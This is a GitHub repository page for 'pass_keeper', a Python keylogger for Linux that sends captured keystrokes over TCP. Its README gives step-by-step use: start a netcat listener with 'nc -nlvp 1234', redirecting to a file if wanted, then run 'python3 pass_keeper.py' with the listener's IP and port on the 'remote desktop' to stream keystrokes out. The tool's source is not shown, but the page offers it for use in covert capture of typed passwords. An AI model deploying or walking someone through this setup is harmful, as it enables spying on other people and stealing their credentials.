Skip to content

whattheslime/pass_keeper

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Pass Keeper

Standalone Key logger over tcp for Linux (Python 3.X)

How to use

On listener desktop

Launch a netcat or other tcp server in listening mode

nc -nlvp 1234

You can also redirect the output in a file

nc -nlvp 1234 > file.txt

On remote desktop

  1. Download the project on the desktop

  2. Launch the script pass_keeper.py with two arguments (Destination IP Address and Destination Port)

python3 pass_keeper.py 127.0.0.1 1234

About

Key logger standalone made in python

Resources

Stars

Watchers

Forks

Packages

No packages published

Languages